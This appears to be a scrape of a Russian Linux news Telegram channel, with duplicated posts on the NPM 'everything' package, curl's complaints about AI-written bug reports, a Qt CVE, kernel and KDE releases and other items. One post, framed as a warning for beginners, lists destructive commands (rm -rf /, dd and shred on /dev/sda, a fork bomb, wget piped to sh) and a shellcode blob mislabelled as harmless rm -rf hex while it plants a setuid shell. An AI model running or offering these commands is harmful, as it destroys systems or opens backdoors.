Эксперимент с созданием NPM-пакета, зависимого от всех пакетов в репозитории
Данный эксперимент провёл один из разработчиков JavaScript-пакетов. Так, пакет "everything" связан прямыми зависимостями с пятью пакетами "@everything-registry/chunk-N", которые в свою очередь привязываются зависимостями к более 3000 пакетов "sub-chunk-N", в каждом из которых осуществляется привязка к 800 существующих пакетов в репозитории.
Размещение "everything" в NPM привело к двум интересным эффектам.
▪️ Во-первых, пакет "everything" стал своеобразным инструментом для совершения DoS-атак, так как попытка его установки приводит к загрузке миллионов размещённых в NPM пакетов и исчерпанию имеющегося дискового пространства или остановке выполнения сборочных процессов. По статистике NPM пакет был загружен около 250 раз, но никто не мешает добавить его в зависимости к другому пакету после взлома учётной записи разработчика для совершения диверсии.
▪️ Во-вторых, публикация пакета "everything" фактически заблокировала возможность удаления любых пакетов в NPM, которые оказались в списке его зависимостей. Пакет из NPM может быть удалён автором только если он ещё не используется в зависимостях других пакетов, но после публикации "everything" зависимостями оказались охвачены все пакеты в репозитории.
✅ Примечательно, что удаление самого пакета "everything" также оказалось заблокированным, так как 9 лет назад в репозитории был размещён тестовый пакет "everything-else", в котором была указана строка "everything" в списке зависимостей.
Linux / Линукс🎄
Данный эксперимент провёл один из разработчиков JavaScript-пакетов. Так, пакет "everything" связан прямыми зависимостями с пятью пакетами "@everything-registry/chunk-N", которые в свою очередь привязываются зависимостями к более 3000 пакетов "sub-chunk-N", в каждом из которых осуществляется привязка к 800 существующих пакетов в репозитории.
Размещение "everything" в NPM привело к двум интересным эффектам.
▪️ Во-первых, пакет "everything" стал своеобразным инструментом для совершения DoS-атак, так как попытка его установки приводит к загрузке миллионов размещённых в NPM пакетов и исчерпанию имеющегося дискового пространства или остановке выполнения сборочных процессов. По статистике NPM пакет был загружен около 250 раз, но никто не мешает добавить его в зависимости к другому пакету после взлома учётной записи разработчика для совершения диверсии.
▪️ Во-вторых, публикация пакета "everything" фактически заблокировала возможность удаления любых пакетов в NPM, которые оказались в списке его зависимостей. Пакет из NPM может быть удалён автором только если он ещё не используется в зависимостях других пакетов, но после публикации "everything" зависимостями оказались охвачены все пакеты в репозитории.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
😁44
This media is not supported in your browser
VIEW IN TELEGRAM
10 команд Linux, которые убьют ваш сервер (для новичков)
Необратимые
▪️
(16-ричное представление команды rm –rf /, его система тоже поймёт)
▪️
▪️
▪️
▪️
▪️
Опасные, но обратимые команды
▪️
▪️
▪️
▪️
Linux / Линукс🎄
Необратимые
▪️
rm –rf / - Удаляет всё, до чего только может добраться. Существует несколько вариаций для маскировки этой команды:mkdir test
cd test
touch ./-r
touch ./-f
su
rm * /
char esp[] attribute ((section(“.text”))) /* e.s.p
release */
= “xebx3ex5bx31xc0x50x54x5ax83xecx64x68”
“xffxffxffxffx68xdfxd0xdfxd9x68x8dx99”
“xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7”
“x56x04xf7x56x08xf7x56x0cx83xc4x74x56”
“x8dx73x08x56x53x54x59xb0x0bxcdx80x31”
“xc0x40xebxf9xe8xbdxffxffxffx2fx62x69”
“x6ex2fx73x68x00x2dx63x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
(16-ричное представление команды rm –rf /, его система тоже поймёт)
▪️
sudo dd if=/dev/zero of=/dev/sda bs=8m - Заполняет начальные 40Мбайт (8m) жесткого диска, которые содержат важные данные структуры нулями, что делает невозможным их восстановление и приводит к невозможности загрузки ОС.▪️
shred /dev/sda - Удалит все данные на жёстком диске.▪️
mkfs.ext3 /dev/sda - Форматирование жесткого диска.▪️
chmod -Rv 000 / - Отнимает все разрешения на все файлы и все папки в системе. После ввода этой команды систему нельзя будет даже перезагрузить. А если перезагрузить её вручную, то она всё равно уже не сможет запуститься нормально, так как запрашиваемые при загрузке компоненты будут недоступны.▪️
chown -R nobody:nobody / - Меняет владельца всех файлов и папок системы на “никого”.Опасные, но обратимые команды
▪️
:(){ :|:& };: - Логическая бомба, забивающая память системы, что в итоге приводит к её зависанию. Ни к чему фатальному это не приведет, но перезагрузиться всё же придётся.▪️
команда > file.conf - Команда, которая может перезаписать важный конфигурационный файл.▪️
wget https://вредоносный_сайт -O- | sh - Скачивание и последующие исполнение какого-либо скрипта c сайта в Интернете.▪️
chmod -R 777 / - Даёт разрешение всем пользователям системы читать, перезаписывать и запускать всё что угодно.Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Дэниел Cтенберг, автор утилиты для получения и отправки данных по сети curl, выступил с критикой использования AI-инструментов при создании отчётов об уязвимостях. Подобные отчёты включают детальные сведения, написаны нормальным языком и выглядят качественными, но без вдумчивого анализа на деле могут лишь вводить в заблуждение, подменяя реальные проблемы качественно выглядящим мусорным содержимым.
Проект Curl выплачивает вознаграждения за выявление новых уязвимостей и уже получил 415 отчётов о потенциальных проблемах, из которых лишь 64 были подтверждены как уязвимости, 77 описывали не связанные с безопасностью ошибки, а 274 (66 %) не содержали каких-либо полезных сведений и только отняли у разработчиков время.
✅ Разработчики вынуждены впустую тратить много времени на разбор бесполезных отчётов и перепроверять указанные там сведения по несколько раз, так как внешнее качество оформления вызывает дополнительное доверие к информации и возникает ощущение, что разработчик что-то недопонял. С другой стороны, формирование подобного отчёта требует минимальных усилий от заявителя, который не утруждает себя проверкой наличия реальной проблемы, а просто слепо копирует данные полученные от AI-помощников, надеясь на везение в борьбе за получение вознаграждения.
Linux / Линукс🎄
Проект Curl выплачивает вознаграждения за выявление новых уязвимостей и уже получил 415 отчётов о потенциальных проблемах, из которых лишь 64 были подтверждены как уязвимости, 77 описывали не связанные с безопасностью ошибки, а 274 (66 %) не содержали каких-либо полезных сведений и только отняли у разработчиков время.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍24
Компрометация учётной записи привела к сбою BGP-маршрутизации Orange Espagne
Компрометация учётной записи администратора привела к почти четырёхчасовому сбою в работе второго по величине испанского оператора связи Orange Espagne, обслуживающего 11 млн абонентов. Для доступа к интерфейсу регистратора RIPE NCC в Orange Espagne применялся предсказуемый пароль "ripeadmin" и не была включена двухфакторная аутентификация.
Пароль к RIPE был перехвачен в ходе поражения системы одного из сотрудников вредоносным ПО и с сентября находился в продаваемых на чёрном рынке базах скомпрометированных паролей. Примечательно, что кроме учётной записи Orange Espagne в указанных базах присутствуют и тысячи других аккаунтов для подключения к access. ripe. net, которые потенциально можно использовать для совершения подобных атак.
Linux / Линукс🎄
Компрометация учётной записи администратора привела к почти четырёхчасовому сбою в работе второго по величине испанского оператора связи Orange Espagne, обслуживающего 11 млн абонентов. Для доступа к интерфейсу регистратора RIPE NCC в Orange Espagne применялся предсказуемый пароль "ripeadmin" и не была включена двухфакторная аутентификация.
Пароль к RIPE был перехвачен в ходе поражения системы одного из сотрудников вредоносным ПО и с сентября находился в продаваемых на чёрном рынке базах скомпрометированных паролей. Примечательно, что кроме учётной записи Orange Espagne в указанных базах присутствуют и тысячи других аккаунтов для подключения к access. ripe. net, которые потенциально можно использовать для совершения подобных атак.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
😁15🤯8👍5
Please open Telegram to view this post
VIEW IN TELEGRAM
В библиотеке Qt выявлена уязвимость (CVE-2023-51714) в реализации протокола HTTP/2. Она позволяет добиться записи своих данных за пределы выделенного буфера.
Уязвимость вызвана целочисленным переполнением в коде разбора упакованных заголовков (HPack) и проявляется при получении более 4 ГБ суммарных данных HTTP-заголовков или 2 ГБ для одного заголовка. Проблема устранена в обновлениях Qt 5.15.17, 6.2.11, 6.5.4 и 6.6.2.
Linux / Линукс🎄
Уязвимость вызвана целочисленным переполнением в коде разбора упакованных заголовков (HPack) и проявляется при получении более 4 ГБ суммарных данных HTTP-заголовков или 2 ГБ для одного заголовка. Проблема устранена в обновлениях Qt 5.15.17, 6.2.11, 6.5.4 и 6.6.2.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11
GNOME создает новое расширение системного мониторинга для GNOME Shell
Теперь пользователям GNOME Shell доступна новая опция, разработанная и поддерживаемая самой GNOME. Расширение добавляет ряд значков на верхней панели, рядом с которыми указаны соответствующие нагрузки / скорости:
– CPU load (global; not per-core)
– Memory usage
– Swap usage
– Network upload speed
– Network download speed
Некоторые значки меняют цвет при высокой нагрузке.
Linux / Линукс🎄
Теперь пользователям GNOME Shell доступна новая опция, разработанная и поддерживаемая самой GNOME. Расширение добавляет ряд значков на верхней панели, рядом с которыми указаны соответствующие нагрузки / скорости:
– CPU load (global; not per-core)
– Memory usage
– Swap usage
– Network upload speed
– Network download speed
Некоторые значки меняют цвет при высокой нагрузке.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍42😁5
Please open Telegram to view this post
VIEW IN TELEGRAM
😁85👍7
Релиз ядра Linux 6.7
После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.7. Среди наиболее заметных изменений:
– интеграция ФС Bcachefs,
– прекращение поддержки архитектуры Itanium,
– возможность работы Nouvea с прошивками GSP-R,
– поддержка TLS-шифрования в NVMe-TCP,
– возможность использования исключений в BPF,
– поддержка futex в io_uring,
– оптимизация производительности планировщика fq (Fair Queuing),
– поддержка расширения TCP-AO (TCP Authentication Option),
– возможность ограничения сетевых соединений в механизме защиты Landlock,
– добавлено управление доступом к user namespace и io_uring через AppArmor.
Linux / Линукс🎄
После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 6.7. Среди наиболее заметных изменений:
– интеграция ФС Bcachefs,
– прекращение поддержки архитектуры Itanium,
– возможность работы Nouvea с прошивками GSP-R,
– поддержка TLS-шифрования в NVMe-TCP,
– возможность использования исключений в BPF,
– поддержка futex в io_uring,
– оптимизация производительности планировщика fq (Fair Queuing),
– поддержка расширения TCP-AO (TCP Authentication Option),
– возможность ограничения сетевых соединений в механизме защиты Landlock,
– добавлено управление доступом к user namespace и io_uring через AppArmor.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍28🎉4
Для OpenBSD реализована возможность использования рабочего стола KDE Plasma
Объявлено о доступности пользовательского окружения KDE Plasma 5.27 для установки в OpenBSD-current, формировании готовых для установки пакетов kde-plasma и kde-plasma-extra, и намерении обеспечить поддержку KDE Plasma в весеннем выпуске OpenBSD 7.5. После прекращения поддержки KDE4 в OpenBSD так и не была перенесена возможность использования новой ветки рабочего стола KDE Plasma 5.
Для установки KDE Plasma и KDE Gear теперь достаточно выполнить команды:
pkg_add kde
pkg_add kde-plasma
pkg_add kde-plasma-extra
Linux / Линукс🎄
Объявлено о доступности пользовательского окружения KDE Plasma 5.27 для установки в OpenBSD-current, формировании готовых для установки пакетов kde-plasma и kde-plasma-extra, и намерении обеспечить поддержку KDE Plasma в весеннем выпуске OpenBSD 7.5. После прекращения поддержки KDE4 в OpenBSD так и не была перенесена возможность использования новой ветки рабочего стола KDE Plasma 5.
Для установки KDE Plasma и KDE Gear теперь достаточно выполнить команды:
pkg_add kde
pkg_add kde-plasma
pkg_add kde-plasma-extra
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub заблокировал игровой движок OpenXRay
Репозиторий открытого проекта OpenXRay, воспроизводящего игровой движок для первых частей игры S.T.A.L.K.E.R., оказался заблокирован на GitHub. Проект основан после утечки исходных кодов оригинального движка S.T.A.L.K.E.R. и ставит перед собой цель исправления всех оригинальных недочётов и введения новых возможностей, таких как поддержка 64-разрядных платформ, Linux и OpenGL.
Причиной блокировки стало требование с информацией о нарушении действующего в США Закона об авторском праве в цифровую эпоху, которое было отправлено в GitHub от лица компании GSC Game World, разработавшей серию игр S.T.A.L.K.E.R.
Однако в официальном Twitter-е компании GSC появилось сообщение, что блокировка проведена не по её инициативе и отправленное требование является ложным. Компания GSC одобряет проект OpenXRay и разрешает его использование для модов. Представители компании обещают разобраться в ситуации.
Linux / Линукс🥸
Репозиторий открытого проекта OpenXRay, воспроизводящего игровой движок для первых частей игры S.T.A.L.K.E.R., оказался заблокирован на GitHub. Проект основан после утечки исходных кодов оригинального движка S.T.A.L.K.E.R. и ставит перед собой цель исправления всех оригинальных недочётов и введения новых возможностей, таких как поддержка 64-разрядных платформ, Linux и OpenGL.
Причиной блокировки стало требование с информацией о нарушении действующего в США Закона об авторском праве в цифровую эпоху, которое было отправлено в GitHub от лица компании GSC Game World, разработавшей серию игр S.T.A.L.K.E.R.
Однако в официальном Twitter-е компании GSC появилось сообщение, что блокировка проведена не по её инициативе и отправленное требование является ложным. Компания GSC одобряет проект OpenXRay и разрешает его использование для модов. Представители компании обещают разобраться в ситуации.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯47🗿8👍5❤3😁3
Please open Telegram to view this post
VIEW IN TELEGRAM
🗿59👍10😁8
Разработчики Arch Linux задействовали проект dbus-broker в качестве применяемой по умолчанию реализации шины D-Bus. Утверждается, что использование dbus-broker вместо классического фонового процесса dbus-daemon позволит повысить надёжность, увеличить производительность и улучшить интеграцию с systemd.
Возможность использования старого фонового процесса dbus-daemon в качестве опции сохранена.
Linux / Линукс🥸
Возможность использования старого фонового процесса dbus-daemon в качестве опции сохранена.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Прекращение поддержки LTS-ядра Linux 4.14
Опубликован финальный выпуск ядра Linux 4.14.336, который станет последним в данной серии.
Разработчиками ядра продолжается сопровождение следующих longterm-веток:
• 6.6 - до декабря 2026 г. (используется в Ubuntu 24.04).
• 6.1 - до декабря 2026 г. + поддержка в рамках SLTS (используется в Debian 12 и main ветке OpenWRT).
• 5.15 - до октября 2026 г. (используется в Ubuntu 22.04, Oracle Unbreakable Enterprise Kernel 7 и OpenWRT 23.05).
• 5.10 - до декабря 2026 г. + поддержка в рамках SLTS (используется в Debian 11, Android 12 и OpenWRT 22).
• 5.4 - до декабря 2025 г. (используется в Ubuntu 20.04 LTS и в Oracle Unbreakable Enterprise Kernel 6)
• 4.19 - до декабря 2024 г. + поддержка в рамках SLTS (используется в Debian 10 и в Android 10).
Linux / Линукс🥸
Опубликован финальный выпуск ядра Linux 4.14.336, который станет последним в данной серии.
Разработчиками ядра продолжается сопровождение следующих longterm-веток:
• 6.6 - до декабря 2026 г. (используется в Ubuntu 24.04).
• 6.1 - до декабря 2026 г. + поддержка в рамках SLTS (используется в Debian 12 и main ветке OpenWRT).
• 5.15 - до октября 2026 г. (используется в Ubuntu 22.04, Oracle Unbreakable Enterprise Kernel 7 и OpenWRT 23.05).
• 5.10 - до декабря 2026 г. + поддержка в рамках SLTS (используется в Debian 11, Android 12 и OpenWRT 22).
• 5.4 - до декабря 2025 г. (используется в Ubuntu 20.04 LTS и в Oracle Unbreakable Enterprise Kernel 6)
• 4.19 - до декабря 2024 г. + поддержка в рамках SLTS (используется в Debian 10 и в Android 10).
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9🤯5👍3🎉3😁1
Началось тестирование кандидата в релизы пользовательского окружения KDE Plasma 6, библиотек KDE Frameworks 6 и коллекции приложений KDE Gear 6. Кандидат в релизы ознаменовал переход на финальную стадию тестирования перед релизом, намеченным на 28 февраля.
Ключевым изменением в ветке KDE 6 является переход на Qt 6, изменение некоторых базовых настроек, проведение чистки устаревших возможностей и поставка обновлённого базового набора библиотек и runtime-компонентов KDE Frameworks 6, формирующего программный стек KDE.
Linux / Линукс
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31
Please open Telegram to view this post
VIEW IN TELEGRAM
🗿69🤔7😁6🤯4
Please open Telegram to view this post
VIEW IN TELEGRAM
😁55